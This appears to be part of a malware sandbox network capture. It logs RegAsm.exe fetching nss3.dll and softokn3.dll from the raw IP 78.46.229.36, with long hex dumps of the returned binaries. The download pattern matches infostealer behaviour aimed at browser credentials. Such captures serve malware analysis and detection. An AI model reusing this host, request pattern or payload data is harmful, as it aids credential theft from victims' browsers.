2024-03-28 08:16:49 UTC	16384	IN	Data Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 Data Ascii: uF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|iqY(R
2024-03-28 08:16:49 UTC	16384	IN	Data Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49913	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:50 UTC	251	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Range: bytes=1024- If-Range: "6315a9f4-1f3950" Cache-Control: no-cache
2024-03-28 08:16:51 UTC	282	IN	HTTP/1.1 206 Partial Content Server: nginx Date: Thu, 28 Mar 2024 08:16:50 GMT Content-Type: application/octet-stream Content-Length: 2045264 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-1f3950" Content-Range: bytes 1024-2046287/2046288
2024-03-28 08:16:51 UTC	16102	IN	Data Raw: 55 89 e5 53 57 56 8b 7d 0c 8b 75 08 8b 5e 0c 85 db 74 3e 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 f7 df 19 c0 8b 7e 0c 0d ff 00 00 00 89 46 48 85 ff 74 12 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 31 c0 5e 5f 5b 5d c3 f7 df 19 c0 0d ff 00 00 00 89 46 48 eb eb cc 55 89 e5 8b 45 08 8b 00 8b 48 20 ff 15 00 40 1e 10 5d ff e1 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 5d e9 07 00 00 00 cc cc cc cc cc cc cc 55 89 e5 57 56 83 e4 f8 83 ec 10 8b 45 14 8b 0d 14 e0 1d 10 31 e9 89 4c 24 0c 83 f8 03 73 32 8b 4d 10 8b 55 0c 8b 75 08 8d 7c 24 04 89 57 fc 89 0f 8b 4e 04 50 57 52 ff 71 18 ff 15 c4 cc 1d 10 89 47 fc 83 f8 ff 74 33 8b 34 24 8b 7c 24 04 eb 14 6a 00 68 9d e8 ff ff e8 b3 b1 12 00 83 c4 08 31 f6 4e 89 f7 8b 4c 24 0c 31 e9 e8 20 9f 14 Data Ascii: USWV}u^t>p@S~FHtx@W1^_[]FHUEH @]U]UWVE1L$s2MUu\|$WNPWRqGt34$\|$jh1NL$1
2024-03-28 08:16:51 UTC	16384	IN	Data Raw: 8b 5d 0c 8b 75 08 8b 7e 0c 85 ff 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 31 ff 89 f1 89 da 57 57 57 ff 75 24 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 e8 3b 00 00 00 83 c4 24 85 c0 75 26 80 7e 57 00 75 20 8b 76 0c 85 f6 74 12 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 56 ff d1 83 c4 04 89 f8 5e 5f 5b 5d c3 89 f1 89 c2 e8 85 22 01 00 89 c7 eb d3 cc 55 89 e5 53 57 56 83 ec 08 89 4d f0 85 d2 0f 84 31 02 00 00 89 d7 8b 45 1c 83 7d 14 00 74 08 85 c0 0f 85 1e 02 00 00 85 c0 0f 94 c0 83 7d 18 00 0f 95 c1 38 c1 0f 84 0a 02 00 00 8b 55 08 83 7d 20 00 0f 94 c0 83 7d 24 00 0f 94 c1 83 c2 80 81 fa 7f ff ff ff 0f 82 ea 01 00 00 30 c8 0f 85 e2 01 00 00 57 e8 63 97 19 00 83 c4 04 a9 00 ff ff 3f 0f 85 ce 01 00 00 8b 5d 0c 89 de 81 e6 00 08 38 00 83 e3 07 Data Ascii: ]u~tp@W1WWWu$u uuuu;$u&~Wu vtx@V^_[]"USWVM1E}t}8U} }$0Wc?]8
2024-03-28 08:16:51 UTC	16384	IN	Data Raw: ff ff 8b 5d 08 c7 43 28 09 00 00 00 68 fc ea 1b 10 53 e8 03 2c 14 00 83 c4 08 31 ff 47 e9 f4 f2 ff ff 31 ff 47 e9 aa fa ff ff ff 74 24 20 e8 b7 2c 14 00 83 c4 04 e9 a4 fc ff ff 8d 4c 24 50 ba ff fd 1b 10 6a 01 e8 bf 68 06 00 83 c4 04 e9 81 fc ff ff 83 c0 10 eb 8d 8d 4c 24 50 ba 56 ee 1c 10 eb e1 89 d0 c1 f8 1f 8b 4c 24 24 50 e8 78 20 15 00 83 c4 04 e9 d8 fc ff ff 8b 44 24 0c 8d 48 50 89 d0 c1 f8 1f 50 e8 5e 20 15 00 83 c4 04 e9 eb fc ff ff 8b 44 24 0c 8d 48 78 89 d0 c1 f8 1f 50 e8 44 20 15 00 83 c4 04 e9 04 fd ff ff 8b 54 24 1c 89 d0 c1 f8 1f 8b 4c 24 24 50 e8 29 20 15 00 83 c4 04 e9 1c fd ff ff 8b 44 24 0c 8d 48 78 89 d0 c1 f8 1f 50 e8 0f 20 15 00 83 c4 04 e9 59 fd ff ff 8b 44 24 0c 8d 88 a0 00 00 00 89 d0 c1 f8 1f 50 e8 f2 1f 15 00 83 c4 04 e9 75 fd ff Data Ascii: ]C(hS,1G1Gt$ ,L$PjhL$PVL$$Px D$HPP^ D$HxPD T$L$$P) D$HxP YD$Pu
2024-03-28 08:16:51 UTC	16384	IN	Data Raw: 88 d7 80 e7 f7 88 59 0a c7 41 4c 40 7a 02 10 80 ff 05 0f 85 aa 00 00 00 c6 41 01 01 80 fa 07 0f 86 bf 00 00 00 bf e0 ab 00 10 b2 01 88 51 02 89 79 50 0f b7 56 1e 66 89 51 0e 8d 7e 20 0f b7 17 66 89 51 10 8a 56 15 88 51 0b 8b 56 24 4a 66 89 51 1a 8b 55 f0 89 d7 01 c7 c6 41 0c 00 0f b7 d2 0f b6 db 01 da 83 c2 08 66 89 51 12 8d 14 1f 83 c2 08 89 51 40 8b 56 24 01 c2 89 51 3c 01 d8 89 41 44 0f b7 7f 03 c1 e7 10 0f cf 66 89 79 18 8b 46 24 83 c0 f8 ba ab aa aa aa f7 e2 c1 ea 02 39 fa 72 54 c7 41 14 ff ff ff ff c6 01 01 8b 46 04 31 f6 f6 40 22 20 75 64 89 f0 83 c4 04 5e 5f 5b 5d c3 80 ff 02 75 61 66 c7 41 01 00 00 c7 41 50 10 a7 00 10 0f b7 56 1a 66 89 51 0e 8d 7e 1c e9 59 ff ff ff c7 41 4c b0 97 15 10 bf d0 97 15 10 31 d2 e9 35 ff ff ff 68 40 7e 1c 10 68 7e 0a Data Ascii: YAL@zAQyPVfQ~ fQVQV$JfQUAfQQ@V$Q<ADfyF$9rTAF1@" ud^_[]uafAAPVfQ~YAL15h@~h~
2024-03-28 08:16:51 UTC	16384	IN	Data Raw: a1 14 00 eb ca 80 fa 43 75 09 89 f1 e8 f9 b2 14 00 eb bc 8a 45 08 88 45 f7 80 fa 41 75 49 f6 c1 10 0f 85 88 00 00 00 f6 c1 02 75 19 83 e1 2c 74 14 0f b6 55 f7 89 f1 6a 01 e8 8c 24 ff ff 83 c4 04 0f b7 5e 08 89 d8 25 d3 ff 00 00 66 89 46 08 f6 c3 02 0f 84 76 ff ff ff 81 e3 40 3e 00 00 83 cb 10 e9 64 ff ff ff 89 d8 c1 e8 03 83 e0 02 09 d8 66 89 46 08 a8 02 75 1b 89 c1 83 e1 2c 74 14 0f b6 55 f7 89 f1 6a 01 e8 3d 24 ff ff 83 c4 04 0f b7 46 08 89 c1 81 e1 c3 bf 00 00 66 89 4e 08 a8 02 75 16 8a 45 f7 88 46 0a e9 20 ff ff ff 81 e3 50 3e 00 00 e9 11 ff ff ff 8a 45 f7 38 46 0a 0f 84 09 ff ff ff 0f b6 55 f7 89 f1 83 c4 04 5e 5b 5d e9 a3 b3 11 00 31 c0 83 7e 10 00 ba 00 00 00 00 0f 84 d5 fe ff ff 89 f1 e8 9b 9f 14 00 0f b7 5e 08 e9 c5 fe ff ff cc cc 55 89 e5 53 57 Data Ascii: CuEEAuIu,tUj$^%fFv@>dfFu,tUj=$FfNuEF P>E8FU^[]1~^USW
2024-03-28 08:16:51 UTC	16384	IN	Data Raw: 08 8b 70 08 ff 15 00 40 1e 10 8d 44 24 30 89 44 24 10 89 5c 24 0c 89 5c 24 04 89 34 24 c7 44 24 08 01 00 00 00 ff d1 83 ec 14 85 ff 0f 84 69 01 00 00 8b 45 08 8b 4c 24 20 88 48 0c 8b 4c 24 48 31 e9 e8 f3 60 13 00 8b 44 24 28 8d 65 f4 5e 5f 5b 5d c3 c7 44 24 2c 00 00 00 00 83 ff 04 0f 85 08 ff ff ff be 00 00 00 00 80 7c 24 24 02 0f 86 a9 fe ff ff e9 f5 fe ff ff 83 ff 04 0f 85 30 01 00 00 a1 88 e6 1d 10 83 c0 02 0f 57 c0 8d 7c 24 30 0f 29 07 31 c9 89 4f 10 89 47 08 8b 0d 0c e4 1d 10 8b 5d 08 8b 73 08 ff 15 00 40 1e 10 89 7c 24 10 31 c0 89 44 24 0c c7 44 24 28 00 00 00 00 89 44 24 04 89 34 24 c7 44 24 08 fe 01 00 00 ff d1 83 ec 14 85 c0 0f 84 38 01 00 00 a1 88 e6 1d 10 83 c0 02 0f 57 c0 0f 29 44 24 30 c7 44 24 40 00 00 00 00 89 44 24 38 8b 0d 94 e3 1d 10 8b Data Ascii: p@D$0D$\$\$4$D$iEL$ HL$H1`D$(e^_[]D$,\|$$0W\|$0)1OG]s@\|$1D$D$(D$4$D$8W)D$0D$@D$8
2024-03-28 08:16:51 UTC	16384	IN	Data Raw: 53 18 8b 5b 10 e8 00 04 14 00 89 c7 85 db 0f 84 7c fc ff ff 85 ff 8b 4c 24 04 74 e3 e9 6f fc ff ff 8b 5c 3e 08 8b 74 3e 0c 89 d8 09 f0 0f 44 74 24 0c 0f 44 5c 24 08 8b 4c 24 14 8b 01 8b 49 04 39 d8 89 ca 19 f2 8b 54 24 10 89 02 89 4a 04 7d 3b 8b 4c 24 04 8b 54 24 10 31 c0 40 50 50 ff 74 24 20 e8 b3 fc 13 00 83 c4 0c 85 c0 75 2b 8b 4c 24 10 8b 01 8b 49 04 c7 44 24 1c 00 00 00 00 39 d8 89 ca 19 f2 7c ca e9 08 fe ff ff c7 44 24 1c 00 00 00 00 e9 fb fd ff ff 89 c7 8b 74 24 04 8b 86 a8 00 00 00 8b 8e ac 00 00 00 83 c0 04 83 d1 00 8b 54 24 14 8b 5a 18 f7 e3 0f af cb 01 d1 89 44 24 20 89 4c 24 24 8b 8e e8 00 00 00 85 c9 74 15 8b 44 24 14 8b 40 2c 3b 41 70 75 13 8b 44 24 14 8b 40 20 eb 1d 85 ff 0f 85 b9 fe ff ff eb 18 8b 54 24 14 c7 42 20 00 00 00 00 8b 41 70 89 Data Ascii: S[\|L$to\>t>Dt$D\$L$I9T$J};L$T$1@PPt$ u+L$ID$9\|D$t$T$ZD$ L$$tD$@,;ApuD$@ T$B Ap
2024-03-28 08:16:51 UTC	16384	IN	Data Raw: d2 0f 84 52 ff ff ff 8b 4d f0 e8 9b fe ff ff 8b 4d f0 e9 42 ff ff ff 8b 4d f0 e8 1b ca 05 00 8b 4d f0 e9 64 ff ff ff cc cc cc 55 89 e5 53 57 56 83 ec 08 89 cf 8b 4d 18 8b 07 89 45 f0 85 d2 75 0a 85 c9 75 6e 83 7d 1c 00 75 68 8b 45 0c 89 f9 89 45 ec 50 ff 75 08 e8 ee 00 00 00 83 c4 08 85 c0 74 6e 89 c3 8b 45 10 8b 33 4e 80 bf d0 00 00 00 02 0f 83 8f 00 00 00 83 78 04 00 75 22 8d 04 f6 8b 4d 14 89 4c c3 1c 8b 4d 18 89 4c c3 38 8b 4d 1c 89 4c c3 3c 89 d8 83 c4 08 5e 5f 5b 5d c3 8b 4d f0 89 c2 e8 00 02 00 00 8d 0c f6 89 44 cb 14 eb cb 85 c9 b8 a1 2b 1c 10 b9 c4 3b 1c 10 0f 45 c8 51 68 ab a3 1b 10 57 e8 6c 66 01 00 83 c4 0c 83 7d 18 00 74 0b 8b 4d f0 8b 55 18 e8 08 7a 12 00 8b 4d f0 8b 55 1c e8 4d c9 05 00 31 db 83 7d 14 00 74 a1 8b 4d f0 8b 55 14 6a 01 e8 28 Data Ascii: RMMBMMdUSWVMEuun}uhEEPutnE3Nxu"MLML8ML<^_[]MD+;EQhWlf}tMUzMUM1}tMUj(
2024-03-28 08:16:51 UTC	16384	IN	Data Raw: c4 08 85 c0 74 0f 39 fe 0f 84 67 f5 ff ff 0f b7 43 32 47 eb db 8b 44 24 10 8b 40 04 89 f9 89 7c 24 2c 0f b7 04 78 66 89 44 24 24 8b 4b 04 8b 44 24 18 0f b7 54 24 24 66 89 14 41 8b 44 24 10 8b 40 20 8b 4c 24 2c 8b 04 88 89 44 24 24 8b 4b 20 8b 44 24 18 8b 54 24 24 89 14 81 8b 44 24 10 8b 40 1c 8b 4c 24 2c 80 3c 08 00 74 04 80 4b 39 02 ff 44 24 18 eb 90 89 fa c1 fa 1f 89 f9 e8 c8 ba fe ff e9 61 f8 ff ff f6 04 02 04 8b 74 02 f2 0f 85 91 00 00 00 56 8b 44 24 10 ff 30 68 11 a1 1b 10 ff 74 24 20 e8 90 26 01 00 83 c4 10 e9 64 f3 ff ff 0f b7 44 24 24 66 89 43 34 e9 b5 f4 ff ff 31 c0 e9 29 fe ff ff 8b 44 24 14 83 78 74 00 0f 84 a5 00 00 00 8b 4c 24 14 e8 cc f9 00 00 89 c6 85 c0 8b 5d 10 0f 84 2b f3 ff ff e9 38 f6 ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 84 96 00 Data Ascii: t9gC2GD$@\|$,xfD$$KD$T$$fAD$@ L$,D$$K D$T$$D$@L$,<tK9D$atVD$0ht$ &dD$$fC41)D$xtL$]+8D$
2024-03-28 08:16:51 UTC	16384	IN	Data Raw: c4 0c eb a4 80 b8 b1 00 00 00 00 0f 85 68 ff ff ff 80 bb d0 00 00 00 00 0f 85 5b ff ff ff 8b 55 ec 8b 14 95 e0 43 1a 10 89 55 e0 8b 93 f8 00 00 00 89 55 e8 8b 80 64 01 00 00 89 45 e4 ff 15 00 40 1e 10 ff 75 e8 6a 00 56 ff 75 e0 6a 20 ff 75 e4 ff d1 83 c4 18 83 f8 01 75 2a bf 17 00 00 00 b8 d6 e8 1b 10 50 53 e8 ce e6 00 00 83 c4 08 89 7b 0c 8b 75 f0 8b 0b 89 f2 83 c4 14 5e 5f 5b 5d e9 25 fb 11 00 a9 fd ff ff ff 74 0a 31 ff 47 b8 ec bb 1b 10 eb cf 85 c0 8b 75 f0 0f 84 d8 fe ff ff eb d2 cc cc cc cc cc cc cc 55 89 e5 57 56 8b 75 08 8b 46 08 f6 40 09 20 75 0b 89 f1 31 d2 e8 c6 2b 03 00 eb 03 8b 40 10 31 d2 bf 00 00 00 00 85 c0 74 05 8b 10 8b 78 04 8b 0e f6 41 09 24 75 0f 89 11 89 79 04 66 c7 41 08 04 00 5e 5f 5d c3 57 e8 f4 5f 13 00 83 c4 04 eb f1 cc cc cc cc Data Ascii: h[UCUUdE@ujVuj uu*PS{u^_[]%t1GuUWVuF@ u1+@1txA$uyfA^_]W_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49914	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:52 UTC	206	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
2024-03-28 08:16:53 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:53 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-3ef50" Accept-Ranges: bytes
2024-03-28 08:16:53 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-03-28 08:16:53 UTC	16384	IN	Data Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(^_[]]
2024-03-28 08:16:53 UTC	16384	IN	Data Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8 Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
2024-03-28 08:16:53 UTC	16384	IN	Data Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71 Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
2024-03-28 08:16:53 UTC	16384	IN	Data Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c Data Ascii: !=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7\|
2024-03-28 08:16:53 UTC	16384	IN	Data Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
2024-03-28 08:16:53 UTC	16384	IN	Data Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZVxM@
2024-03-28 08:16:53 UTC	16384	IN	Data Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73 Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
